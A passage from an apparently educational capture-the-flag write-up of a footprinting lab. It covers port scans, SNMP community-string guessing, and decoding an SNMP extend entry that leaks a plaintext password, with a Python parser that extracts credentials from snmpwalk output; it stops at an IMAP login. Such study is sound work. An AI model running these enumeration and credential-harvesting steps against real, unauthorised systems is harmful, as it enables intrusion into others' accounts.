
Footprinting — Skills Assessment [Part 2] (2025)


Part one covers the Easy and Platform skill assessments; part two focuses only on the Hard skill assessment.

Footprinting Lab — Hard

“The third server is an MX and management server for the internal network. Subsequently, this server has the function of a backup server for the internal accounts in the domain. Accordingly, a user named HTB was also created here, whose credentials we need to access.”

The description mentions an MX server, so I expected to be dealing with mail services (SMTP and/or IMAP/POP3). I started with a full TCP port scan with service and script detection:

nmap 10.129.xxx.xx -sV -sC -p- -v --min-rate=1000 -oN hardSkil_results.txt
PORT    STATE SERVICE  VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: UIDL CAPA USER SASL(PLAIN) AUTH-RESP-CODE STLS PIPELINING TOP RESP-CODES
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Issuer: commonName=NIXHARD
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-11-10T01:30:25
| Not valid after: 2031-11-08T01:30:25
| MD5: 2b45:ec3c:508f:3cfb:9f6a:750c:63f8:2077
|_SHA-1: ed43:7d5a:3c46:54ac:9902:8dc4:9d86:6efb:2ae3:357c
143/tcp open imap Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Issuer: commonName=NIXHARD
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-11-10T01:30:25
| Not valid after: 2031-11-08T01:30:25
| MD5: 2b45:ec3c:508f:3cfb:9f6a:750c:63f8:2077
|_SHA-1: ed43:7d5a:3c46:54ac:9902:8dc4:9d86:6efb:2ae3:357c
|_imap-capabilities: more capabilities have AUTH=PLAINA0001 listed Pre-login OK post-login ID SASL-IR IMAP4rev1 ENABLE LITERAL+ LOGIN-REFERRALS IDLE STARTTLS
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Issuer: commonName=NIXHARD
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-11-10T01:30:25
| Not valid after: 2031-11-08T01:30:25
| MD5: 2b45:ec3c:508f:3cfb:9f6a:750c:63f8:2077
|_SHA-1: ed43:7d5a:3c46:54ac:9902:8dc4:9d86:6efb:2ae3:357c
|_imap-capabilities: capabilities more have OK listed Pre-login post-login ID SASL-IR IMAP4rev1 ENABLE LITERAL+ LOGIN-REFERRALS IDLE AUTH=PLAINA0001
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: UIDL USER SASL(PLAIN) AUTH-RESP-CODE CAPA PIPELINING TOP RESP-CODES
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Issuer: commonName=NIXHARD
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-11-10T01:30:25
| Not valid after: 2031-11-08T01:30:25
| MD5: 2b45:ec3c:508f:3cfb:9f6a:750c:63f8:2077
|_SHA-1: ed43:7d5a:3c46:54ac:9902:8dc4:9d86:6efb:2ae3:357c
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Next I connected to the TLS-wrapped mail ports with openssl s_client to see whether the certificates or banners leaked anything useful, since at this point we were still working from an external viewpoint:

openssl s_client -connect 10.129.xxx.xx:pop3s
CONNECTED(00000003)
Can't use SSL_get_servername
depth=0 CN = NIXHARD
verify error:num=18:self-signed certificate
verify return:1
depth=0 CN = NIXHARD
verify return:1
---
Certificate chain
0 s:CN = NIXHARD
i:CN = NIXHARD
a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
v:NotBefore: Nov 10 01:30:25 2021 GMT; NotAfter: Nov 8 01:30:25 2031 GMT
---
Server certificate
-----BEGIN CERTIFICATE-----
[certificate body omitted]
-----END CERTIFICATE-----
subject=CN = NIXHARD
issuer=CN = NIXHARD
---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA-PSS
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1283 bytes and written 373 bytes
Verification error: self-signed certificate
---
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
Server public key is 2048 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 18 (self-signed certificate)
---
---
Post-Handshake New Session Ticket arrived:
SSL-Session:
Protocol : TLSv1.3
Cipher : TLS_AES_256_GCM_SHA384
Session-ID: B3E7A5A80A7BE58BC40F25977B86EA796895A65AE70A70CC8466739FEC884150
Session-ID-ctx:
Resumption PSK: E24C82FDE4518977A1FF94321F38539BC5CC0499D8472CAB075A0C4DE1F89A8523F7BCADCAF81A70A412CF6FEE84AA1F
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 7200 (seconds)
TLS session ticket:
0000 - 9b 61 a3 5b 90 b5 c2 65-d0 46 0a d3 9e 15 c0 c9 .a.[...e.F......
0010 - d4 70 fb a5 ce 68 66 c1-0b 11 91 27 fe a8 3d b2 .p...hf....'..=.
0020 - 28 bb ff 72 be 81 05 57-0a 45 e3 1b 79 71 4a 09 (..r...W.E..yqJ.
0030 - d3 43 a4 77 15 5f 81 9f-b0 43 b0 3e ba af d5 b7 .C.w._...C.>....
0040 - 4c 59 11 5e bf 86 ee e2-1e d7 06 c0 0d b1 81 21 LY.^...........!
0050 - f2 58 02 43 47 d7 f9 7f-f1 ff b6 21 b0 d3 f2 82 .X.CG......!....
0060 - c0 be e5 6a e6 50 44 7d-1a 2e be 43 35 0a 44 0d ...j.PD}...C5.D.
0070 - 47 ba 50 e0 8d 26 c4 f9-fb 9e cb e3 a6 f0 a3 40 G.P..&.........@
0080 - 19 db e7 99 d2 a0 e1 04-d0 ac b5 b1 90 e1 e2 40 ...............@
0090 - 6e ae 7c 06 ce 82 1a 0b-63 d8 c0 05 5c b6 32 44 n.|.....c...\.2D
00a0 - 80 3e 40 41 5c d3 c7 ec-f5 14 de b4 26 69 67 f7 .>@A\.......&ig.
00b0 - 1a d6 49 22 70 e7 0a 91-64 a0 70 ce 4d 56 c2 41 ..I"p...d.p.MV.A

Start Time: 1763929287
Timeout : 7200 (sec)
Verify return code: 18 (self-signed certificate)
Extended master secret: no
Max Early Data: 0
---
read R BLOCK
---
Post-Handshake New Session Ticket arrived:
SSL-Session:
Protocol : TLSv1.3
Cipher : TLS_AES_256_GCM_SHA384
Session-ID: 3E5EEBBFDAB478D1F9114712E79C657388EB17CD9C632ADA40C3D937A980D664
Session-ID-ctx:
Resumption PSK: ADC138269C8D259A20D775DE13C0FE29433172DE3F04BCB6359213A9C2F7594D7AED21FAEB94FCC73ABF8ECE3526D155
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 7200 (seconds)
TLS session ticket:
0000 - 9b 61 a3 5b 90 b5 c2 65-d0 46 0a d3 9e 15 c0 c9 .a.[...e.F......
0010 - 81 60 c6 bd af f0 28 b2-2e 23 ad 1e af 78 3e d0 .`....(..#...x>.
0020 - 37 d0 e2 b0 14 ec 56 c2-1e 53 e5 de 14 2f 18 d4 7.....V..S.../..
0030 - 18 a0 81 dc 7c 73 24 02-96 cd 06 a1 f7 c6 be 14 ....|s$.........
0040 - a9 26 6e e8 9b e1 c7 18-a0 80 a2 f2 f0 84 a3 c5 .&n.............
0050 - 5b 9d 20 ff 88 15 82 11-71 c6 5d b5 a6 7c 04 04 [. .....q.]..|..
0060 - 70 bd 1a af 12 10 4e d3-8f 84 78 b6 c6 76 7c a8 p.....N...x..v|.
0070 - af 89 d4 8d ba 9f d2 12-fa ba 34 34 bf 3d 91 a1 ..........44.=..
0080 - f8 79 32 47 aa 06 89 ab-a1 ef 65 fe 6c af 0f 7e .y2G......e.l..~
0090 - 11 b9 f3 77 8f 02 59 79-5d 0d bd af 72 3b 6b b0 ...w..Yy]...r;k.
00a0 - 34 d6 12 96 4d c3 b5 f3-2f 61 0c f3 f3 e5 fe 17 4...M.../a......
00b0 - 5b a3 92 4a 4c 9f 3d 16-0c 12 2b 14 2b d2 a7 62 [..JL.=...+.+..b

Start Time: 1763929287
Timeout : 7200 (sec)
Verify return code: 18 (self-signed certificate)
Extended master secret: no
Max Early Data: 0
---
read R BLOCK
+OK Dovecot (Ubuntu) ready.
openssl s_client -connect 10.129.xxx.xx:imaps
CONNECTED(00000003)
Can't use SSL_get_servername
depth=0 CN = NIXHARD
verify error:num=18:self-signed certificate
verify return:1
depth=0 CN = NIXHARD
verify return:1
---
Certificate chain
0 s:CN = NIXHARD
i:CN = NIXHARD
a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
v:NotBefore: Nov 10 01:30:25 2021 GMT; NotAfter: Nov 8 01:30:25 2031 GMT
---
Server certificate
-----BEGIN CERTIFICATE-----
[certificate body omitted]
-----END CERTIFICATE-----
subject=CN = NIXHARD
issuer=CN = NIXHARD
---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA-PSS
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1283 bytes and written 373 bytes
Verification error: self-signed certificate
---
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
Server public key is 2048 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 18 (self-signed certificate)
---
---
Post-Handshake New Session Ticket arrived:
SSL-Session:
Protocol : TLSv1.3
Cipher : TLS_AES_256_GCM_SHA384
Session-ID: 4750EA78CBE552EC859CE0795A28A01DB3A43FBE59166378CFBF5693BC9DD816
Session-ID-ctx:
Resumption PSK: 1F4F09C96EFDCDB44BBD8134DBAA47D23D8D86CC68C4CA4993DC47D486DD5E7166E27962595800F249321D4569BCFB14
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 7200 (seconds)
TLS session ticket:
0000 - 31 5c 4b 8f 3b bb 48 dc-e1 8a c4 73 23 78 44 1c 1\K.;.H....s#xD.
0010 - eb 63 fd 56 78 c8 62 60-a0 12 a0 05 2d d4 c4 b5 .c.Vx.b`....-...
0020 - 39 37 12 84 66 ac e9 3b-46 99 8a 7e b2 a2 05 55 97..f..;F..~...U
0030 - 29 0c e8 b4 b0 a4 0a 26-07 96 a0 10 36 46 3e d8 )......&....6F>.
0040 - 95 8d ae 4a 87 f7 01 a3-9a 39 3e 4c 2e c2 03 8b ...J.....9>L....
0050 - da a9 a1 26 99 4d 36 0d-4c ae aa d4 1b 2e 1b f8 ...&.M6.L.......
0060 - 18 09 36 c4 0f 80 3d f6-04 06 b9 da ea 1d 7f 5a ..6...=........Z
0070 - 6e 25 0f ce 06 7a 1d 22-79 a0 06 cc dc f4 72 08 n%...z."y.....r.
0080 - 48 04 4c 12 70 28 ee e9-3e a1 10 01 2f 08 72 8d H.L.p(..>.../.r.
0090 - d6 6e 9f ae 96 48 a5 1a-c3 ba ea 89 fa c5 f5 c3 .n...H..........
00a0 - cd 31 25 40 d8 e7 a3 52-e7 9c bb d6 b1 a2 f0 5b .1%@...R.......[
00b0 - 61 2b 16 cd 91 0a d4 89-40 e2 94 f0 4a bd 45 4c a+......@...J.EL

Start Time: 1763929404
Timeout : 7200 (sec)
Verify return code: 18 (self-signed certificate)
Extended master secret: no
Max Early Data: 0
---
read R BLOCK
---
Post-Handshake New Session Ticket arrived:
SSL-Session:
Protocol : TLSv1.3
Cipher : TLS_AES_256_GCM_SHA384
Session-ID: 68EED913B41FF8C3FA9D86EAF6B3A0DADD5A3420B919CC6B8998FC9B6AE78F81
Session-ID-ctx:
Resumption PSK: 1881B96CBE616C1507FF17ED47945FEEFB3DEADA3B4721B3715AC941D3F22425FE56EBFDEBA113FDD5B6EED681E291D6
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 7200 (seconds)
TLS session ticket:
0000 - 31 5c 4b 8f 3b bb 48 dc-e1 8a c4 73 23 78 44 1c 1\K.;.H....s#xD.
0010 - b3 1b 3c 12 63 56 69 96-02 77 c2 55 d4 cb 18 df ..<.cVi..w.U....
0020 - d5 ab 6a 54 b9 bb 01 8d-9c 04 34 15 56 0a c9 2a ..jT......4.V..*
0030 - 26 d4 2f 51 60 25 b1 7b-70 b7 b1 2d ad d0 3a be &./Q`%.{p..-..:.
0040 - 67 bf 59 22 20 33 82 3c-3a ef 39 bf 3a 1c 1e fb g.Y" 3.<:.9.:...
0050 - 6e 8d e9 b4 5a 7d 40 c3-eb 4c f7 c8 90 e0 9e 05 n...Z}@..L......
0060 - ea 2b 43 7a 1b da 37 69-a2 09 2b 5f 00 e5 c5 22 .+Cz..7i..+_..."
0070 - 5d b2 e4 f0 6e 23 c5 66-cb 70 85 18 da c9 b6 27 ]...n#.f.p.....'
0080 - cf c0 e7 81 ee bc 2a 1d-f9 50 da 2b 4d ef 9f 52 ......*..P.+M..R
0090 - 00 d5 86 8c 42 7e 8c dc-c4 7a 89 03 9a 19 8f 22 ....B~...z....."
00a0 - 5e dc 67 f3 ab 5d 7e 13-c4 d0 1d a3 3f 02 18 d1 ^.g..]~.....?...
00b0 - 9f 34 8f 01 37 d1 00 65-3d d9 79 52 9b b1 a8 5c .4..7..e=.yR...\

Start Time: 1763929404
Timeout : 7200 (sec)
Verify return code: 18 (self-signed certificate)
Extended master secret: no
Max Early Data: 0
---
read R BLOCK
* OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] Dovecot (Ubuntu) ready.


The only clue so far was the certificate's common name, NIXHARD, which looks like the server's hostname rather than an organisation name. I then ran a UDP scan and found UDP/161 open, i.e. SNMP. (A full UDP port scan with version detection is slow; scanning the most common UDP ports first would have found 161 much faster.)

nmap 10.129.xxx.xx -sV -sC -p- --min-rate=1000 -v -sU -oN UDPresults.txt
PORT    STATE SERVICE VERSION
161/udp open snmp net-snmp; net-snmp SNMPv3 server
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 5b99e75a10288b6100000000
| snmpEngineBoots: 11
|_ snmpEngineTime: 21m46s

SNMP looked like the starting point; we were still external at this stage. I used onesixtyone with the same community-string wordlist as before to see whether any community string would answer:

onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 10.129.xxx.xx

That produced nothing. Next I tried snmpwalk with the default read-only community string:

snmpwalk -v2c -c public 10.129.202.20

That returned nothing either. Looking back at the assessment description, I had missed a detail: this is a backup server. Guessing a community string from that role, backup, worked where the wordlist had not, and walking the tree with it revealed some key details:

snmpwalk -v2c -c backup 10.129.xxx.xx
iso.3.6.1.2.1.1.1.0 = STRING: "Linux NIXHARD 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (287141) 0:47:51.41
iso.3.6.1.2.1.1.4.0 = STRING: "Admin <tech@inlanefreight.htb>"
iso.3.6.1.2.1.1.5.0 = STRING: "NIXHARD"
iso.3.6.1.2.1.1.6.0 = STRING: "Inlanefreight"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (11) 0:00:00.11
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (288070) 0:48:00.70
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E9 0B 19 01 2A 34 00 2B 00 00
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.4.0-90-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro ipv6.disable=1 maybe-ubiquity
"

iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 141
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
iso.3.6.1.2.1.25.1.7.1.1.0 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.2.6.66.65.67.75.85.80 = STRING: "/opt/tom-recovery.sh"
iso.3.6.1.2.1.25.1.7.1.2.1.3.6.66.65.67.75.85.80 = STRING: "tom NMds732Js2761"
iso.3.6.1.2.1.25.1.7.1.2.1.4.6.66.65.67.75.85.80 = ""
iso.3.6.1.2.1.25.1.7.1.2.1.5.6.66.65.67.75.85.80 = INTEGER: 5
iso.3.6.1.2.1.25.1.7.1.2.1.6.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.7.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.20.6.66.65.67.75.85.80 = INTEGER: 4
iso.3.6.1.2.1.25.1.7.1.2.1.21.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.3.1.1.6.66.65.67.75.85.80 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:"
iso.3.6.1.2.1.25.1.7.1.3.1.2.6.66.65.67.75.85.80 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:
Authentication token manipulation error
chpasswd: (line 1, user tom) password not changed
Changing password for tom."

iso.3.6.1.2.1.25.1.7.1.3.1.3.6.66.65.67.75.85.80 = INTEGER: 4
iso.3.6.1.2.1.25.1.7.1.3.1.4.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.1 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.2 = STRING: "Authentication token manipulation error"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.3 = STRING: "chpasswd: (line 1, user tom) password not changed"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.4 = STRING: "Changing password for tom."
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.4 = No more variables left in this MIB View (It is past the end of the MIB tree)

Three things stand out in this walk:

1. The OID index 6.66.65.67.75.85.80 is a length-prefixed string: six bytes, "BACKUP". That is the token name of a Net-SNMP extend entry, and the columns under .2.1 describe it: "/opt/tom-recovery.sh" is the command and "tom NMds732Js2761" is its argument string. In other words, snmpd runs /opt/tom-recovery.sh tom NMds732Js2761 for whoever reads this subtree, which makes the script look like a credential-reset contingency for Tom's account.

2. "tom NMds732Js2761" is therefore a username and a plaintext password. The obvious targets are POP3S/IMAPS, but any service on the host that knows a user tom is worth trying.

3. The rows under .3.1 and .4.1.2 are the command's output and exit status: chpasswd failed with "Authentication token manipulation error" and exit code 1, which is what chpasswd reports when it is not running as root. That is consistent with snmpd executing the script under its unprivileged service account rather than as root.
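Decoding the extend table by hand is error-prone, so here is an added example (not part of the original walkthrough) that parses snmpwalk output, decodes the length-prefixed string index into the entry name, and rebuilds each extend entry's command, arguments, output lines and exit code. It assumes the extend tables live under iso.3.6.1.2.1.25.1.7.1 as on this host (a stock net-snmp agent uses iso.3.6.1.4.1.8072.1.3.2; pass that as base) and that snmpwalk prints OIDs in the iso.-prefixed form shown above. The embedded sample is a constructed subset of the walk above.

```python
import re
from collections import defaultdict

# OID under which this host exposes the Net-SNMP "extend" tables (seen in the walk above).
# A stock net-snmp agent publishes them under iso.3.6.1.4.1.8072.1.3.2 instead.
DEFAULT_EXTEND_BASE = "iso.3.6.1.2.1.25.1.7.1"

# Column numbers from NET-SNMP-EXTEND-MIB (nsExtendConfigTable / nsExtendOutput1Table).
CONFIG_COLS = {2: "command", 3: "args", 4: "input", 5: "cache_time",
               6: "exec_type", 7: "run_type", 20: "storage", 21: "status"}
OUTPUT1_COLS = {1: "first_line", 2: "full_output", 3: "num_lines", 4: "exit_code"}
OUTLINE_COL = 2  # nsExtendOutLine in nsExtendOutput2Table (one row per output line)

START_RE = re.compile(r'^\S+ = ')
RECORD_RE = re.compile(r'^(?P<oid>\S+) = (?:(?P<type>[A-Za-z0-9-]+): )?(?P<val>.*)$', re.S)

# Constructed sample: the extend-table rows from the snmpwalk output above, including the
# multi-line nsExtendOutputFull value and snmpwalk's trailing end-of-subtree marker.
SAMPLE_WALK = '''\
iso.3.6.1.2.1.1.5.0 = STRING: "NIXHARD"
iso.3.6.1.2.1.25.1.7.1.1.0 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.2.6.66.65.67.75.85.80 = STRING: "/opt/tom-recovery.sh"
iso.3.6.1.2.1.25.1.7.1.2.1.3.6.66.65.67.75.85.80 = STRING: "tom NMds732Js2761"
iso.3.6.1.2.1.25.1.7.1.2.1.4.6.66.65.67.75.85.80 = ""
iso.3.6.1.2.1.25.1.7.1.2.1.5.6.66.65.67.75.85.80 = INTEGER: 5
iso.3.6.1.2.1.25.1.7.1.3.1.1.6.66.65.67.75.85.80 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:"
iso.3.6.1.2.1.25.1.7.1.3.1.2.6.66.65.67.75.85.80 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:
Authentication token manipulation error
chpasswd: (line 1, user tom) password not changed
Changing password for tom."

iso.3.6.1.2.1.25.1.7.1.3.1.3.6.66.65.67.75.85.80 = INTEGER: 4
iso.3.6.1.2.1.25.1.7.1.3.1.4.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.1 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.2 = STRING: "Authentication token manipulation error"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.3 = STRING: "chpasswd: (line 1, user tom) password not changed"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.4 = STRING: "Changing password for tom."
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.4 = No more variables left in this MIB View (It is past the end of the MIB tree)
'''


def _records(walk_text):
    """Yield one (oid, type, value) per varbind; a STRING that spans several lines
    (snmpwalk prints it until the closing quote) is joined back into one record."""
    buf = []
    for line in walk_text.splitlines():
        if START_RE.match(line) and buf:
            yield _split("\n".join(buf))
            buf = []
        buf.append(line)
    if buf:
        yield _split("\n".join(buf))


def _split(record):
    m = RECORD_RE.match(record)
    if not m:
        return record, None, None
    typ, raw = m.group("type"), m.group("val").strip()
    if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
        raw = raw[1:-1]
    if typ in ("INTEGER", "Gauge32", "Counter32") and raw.lstrip("-").isdigit():
        raw = int(raw)
    return m.group("oid"), typ, raw


def decode_string_index(sub_ids):
    """Decode a variable-length OCTET STRING table index: the first sub-identifier is the
    length, then one sub-identifier per byte (6.66.65.67.75.85.80 -> "BACKUP").
    Returns (name, remaining sub-identifiers)."""
    n = int(sub_ids[0])
    if len(sub_ids) < 1 + n:
        raise ValueError("truncated string index: %r" % (sub_ids,))
    name = bytes(int(x) for x in sub_ids[1:1 + n]).decode("latin-1")
    return name, sub_ids[1 + n:]


def parse_extend_entries(walk_text, base=DEFAULT_EXTEND_BASE):
    """Rebuild every extend entry (config, first output line, exit code, per-line output)
    keyed by its token name."""
    entries = defaultdict(lambda: {"output_lines": {}})
    prefix = base + "."
    for oid, typ, val in _records(walk_text):
        if not oid.startswith(prefix):
            continue
        if typ is None and isinstance(val, str) and val.startswith("No more variables"):
            continue  # snmpwalk's end-of-subtree marker, not a real varbind
        sub = oid[len(prefix):].split(".")
        if len(sub) < 4:
            continue  # nsExtendNumEntries (.1.0) carries no per-entry data
        table, col, rest = int(sub[0]), int(sub[2]), sub[3:]
        try:
            name, tail = decode_string_index(rest)
        except ValueError:
            continue
        ent = entries[name]
        if table == 2 and col in CONFIG_COLS:
            ent[CONFIG_COLS[col]] = val
        elif table == 3 and col in OUTPUT1_COLS:
            ent[OUTPUT1_COLS[col]] = val
        elif table == 4 and col == OUTLINE_COL and tail:
            ent["output_lines"][int(tail[0])] = val
    return dict(entries)


def credentials_from_entry(entry):
    """The script behind this entry is `echo $1:$2 | chpasswd`, so its two arguments are a
    username and a plaintext password. Returns (user, password), or None if the argument
    string does not have exactly two fields."""
    parts = (entry.get("args") or "").split()
    return (parts[0], parts[1]) if len(parts) == 2 else None


if __name__ == "__main__":
    import sys
    text = SAMPLE_WALK if sys.stdin.isatty() else sys.stdin.read()
    for name, ent in parse_extend_entries(text).items():
        print(f"[{name}] {ent.get('command')} {ent.get('args')!r} -> exit {ent.get('exit_code')}")
        for n in sorted(ent["output_lines"]):
            print(f"    {n}: {ent['output_lines'][n]}")
        creds = credentials_from_entry(ent)
        if creds:
            print(f"    credentials: user={creds[0]} password={creds[1]}")
```

Run it against a live target with `snmpwalk -v2c -c backup 10.129.xxx.xx 1.3.6.1.2.1.25.1.7.1 | python3 extend_decode.py`; with no stdin it decodes the embedded sample. Walking only the extend subtree keeps the output short and, because the entry has run-type 1 (run on read), every walk re-executes the script on the target, which is worth remembering on a real engagement.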

With these credentials I first tried SSH as tom, but got Permission denied (publickey). That message means the server only accepts public-key authentication (password authentication is disabled), so the password is useless for SSH whether or not it is correct; it neither confirms nor denies that the user exists. I assumed Tom's private key might be sitting in his mailbox.

ssh tom@10.129.xxx.xx  

Next I tried the mail services with these credentials, starting with POP3S through openssl s_client. The login worked, but the RETR 1 that followed never reached the server: in interactive mode s_client treats a line beginning with a capital R as its renegotiate hotkey, and TLS 1.3 has no renegotiation, hence the wrong ssl version error below. Starting s_client with -quiet (or -ign_eof) disables the hotkeys; alternatively, type POP3 commands in lowercase, which the protocol permits.

read R BLOCK
+OK Dovecot (Ubuntu) ready.
USER tom
+OK
PASS NMds732Js2761
+OK Logged in.
RETR 1
RENEGOTIATING
ERROR
40E7C61A507F0000:error:0A00010A:SSL routines:can_renegotiate:wrong ssl version:../ssl/ssl_lib.c:2882:

I left POP3 there and moved on to IMAPS, which provided the next breakthrough. I was not very familiar with the IMAP command set, so the session below is a bit of trial and error (each command is prefixed with a client-chosen tag, here 1 or a):

1 LOGIN tom NMds732Js2761
